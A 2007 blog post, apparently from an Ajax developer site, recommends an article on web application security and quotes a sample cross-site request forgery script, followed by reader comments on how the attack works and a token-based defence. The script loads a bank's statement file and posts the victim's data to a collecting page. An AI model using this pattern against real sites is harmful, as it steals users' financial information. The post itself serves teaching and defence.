Friday, February 2nd, 2007

Making your web applications more secure:

Category: Security

Nadav Samet has written a simple article explaining various security attacks called Prepare for Attack!—Making Your Web Applications More Secure.

It explains in simple terms, with simple code examples:

  • SQL Injection Attacks
  • XSRF: Cross-Site Request Forgery
  • XSS: Cross-Site Scripting

XSRF: Stealing Information with Scriptaculous

  <script src="http://www.tgbank.com/monthly_statement.js" type="text/javascript"></script>
  <script type="text/javascript">
      function send_data_to_the_criminal() {
          /* code that converts the statement
             object to string goes here */
          new Ajax.Request('/collect_other_people_data.php',
                  { postBody: 'data=' + statement });
      }
      window.onload = send_data_to_the_criminal;
  </script>

Posted by Dion Almaer at 2:05 am


8 Comments »


So I do not understand how others are programming their projects using Ajax, but I think that there is a simple way to code secure Ajax apps. Well, just take Ajax-Request like common page requests (for instance browse from one page to another within the website). There are always some security methods involved when the request starts. Just like checking GET/POST Data, Session Variables and so on.

Now when using these methods within the Ajax-Request, there should not be any trouble with the security of the website compared to the normal old fashioned way!!!

In the example above, the scripts inside monthly_statements.js should just make sure that DATA is only sent to clients who have a valid and running session. If the client (in this case the criminal) is not authenticated, there should be no data for him!!!

Comment by Georges — February 2, 2007

George, the client is not the criminal but the victim. He may browse the criminal’s website while he is logged in to the bank in another browser window.

Comment by Nadav Samet — February 2, 2007

Exactly! And – going by the first comment to this post – that’s why we need reminders on good practice.

Comment by ajaxianfading — February 2, 2007

Ajax.Request is a component of Prototype, not Scriptaculous.

Comment by kourge — February 2, 2007

@Nadav: Ok, so I misunderstood that sort of attack! But how to stop/detect such attacks?

Comment by Georges — February 2, 2007

Georges, one way to handle this is that the application will serve the request only if it gets a certain query argument. That value of this argument should be something that only your site can produce and validate, but it will be harder for another site to produce. For instance, it can be a SHA1 of the username and some secret word of your choice.

So you can easily validate this on every sensitive request, but remote sites can’t produce this value easily.

Comment by Nadav Samet — February 2, 2007

Thanks for that enlightenment Nadav ;)

I also read your article on your site. I certainly will implement this level of security in my next project.

Comment by Georges — February 2, 2007

Good article. I understand SQL Injection and I'm currently developing my own application to test it using C#.
I do not understand the remaining subjects.
Regards,
AboKhaled

Comment by AbuKhaled — February 19, 2007
